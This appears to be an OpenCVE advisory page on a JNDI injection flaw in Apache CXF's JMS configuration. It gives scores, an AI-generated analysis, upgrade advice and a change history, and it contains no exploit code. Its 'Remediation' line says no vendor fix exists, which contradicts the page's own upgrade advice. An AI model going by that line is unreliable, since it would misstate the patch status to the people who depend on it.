Description
A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
Published: 2026-06-12
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

This vulnerability is a JNDI injection flaw in the JMSConfigFactory component of Apache CXF that permits arbitrary code execution when untrusted parties are allowed to configure JMS. The flaw results from insufficient input validation, as identified by CWE-20 and CWE-502, allowing attackers to inject malicious JNDI references that resolve to executable code on the server. Although the description does not specify a particular network-level attack vector, it is inferred that the weakness can be exploited through the JMS configuration mechanisms exposed to non-privileged users.

Affected Systems

Affected systems are installations of Apache CXF that permit untrusted users to provide JMS configuration data. The advisory recommends upgrading to Apache CXF 4.2.2 or 4.1.7 to remediate the flaw. Any prior release that has not applied the patch is vulnerable, regardless of the specific version number; the most recent official fix is provided in the cited versions.

Risk and Exploitability

The CVSS score of 8.1 denotes a high severity, indicating that a successful exploit could lead to complete system compromise. The EPSS score of less than 1% suggests that the probability of exploitation in the wild is currently low, but the high severity justifies immediate action. The vulnerability is not listed in the CISA KEV catalog, meaning no known active exploitation has been observed, yet this does not diminish the urgency of patching. Attackers likely need access to the JMS configuration interface; thus environments that allow untrusted users to supply JMS configuration are the most vulnerable. The combination of a high severity flaw, even with low exploitation probability, means that prompt remediation is essential.

Generated by OpenCVE AI on June 18, 2026 at 12:53 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to Apache CXF 4.2.2 or 4.1.7, which resolves the JNDI injection flaw.
  • Restrict JMS configuration capabilities to trusted administrators or services; disable the feature for untrusted users.
  • Implement application‑level validation to reject or sanitize untrusted JMS configuration values, mitigating the input validation weaknesses (CWE‑20 and CWE‑502).

Generated by OpenCVE AI on June 18, 2026 at 12:53 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 17 Jun 2026 12:15:00 +0000

Type Values Removed Values Added
Weaknesses CWE-502
References
Metrics threat_severity

None

threat_severity

Important


Fri, 12 Jun 2026 19:00:00 +0000

Type Values Removed Values Added
First Time appeared Apache
Apache cxf
Weaknesses NVD-CWE-noinfo
CPEs cpe:2.3:a:apache:cxf:*:*:*:*:*:*:*:*
Vendors & Products Apache
Apache cxf

Fri, 12 Jun 2026 15:30:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 12 Jun 2026 14:30:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 12 Jun 2026 09:45:00 +0000

Type Values Removed Values Added
Description A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
Title Apache CXF: JNDI Injection Vulnerability in JMSConfigFactory
Weaknesses CWE-20
References

cve-icon MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-07-02T12:05:01.070Z

Reserved: 2026-06-05T11:08:49.320Z

Link: CVE-2026-50632

cve-icon Vulnrichment

Updated: 2026-07-02T12:05:01.070Z

cve-icon NVD

Status : Analyzed

Published: 2026-06-12T10:16:23.183

Modified: 2026-06-12T18:58:03.547

Link: CVE-2026-50632

cve-icon Redhat

Severity : Important

Publid Date: 2026-06-12T09:00:48Z

Links: CVE-2026-50632 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-06-18T13:00:16Z

Weaknesses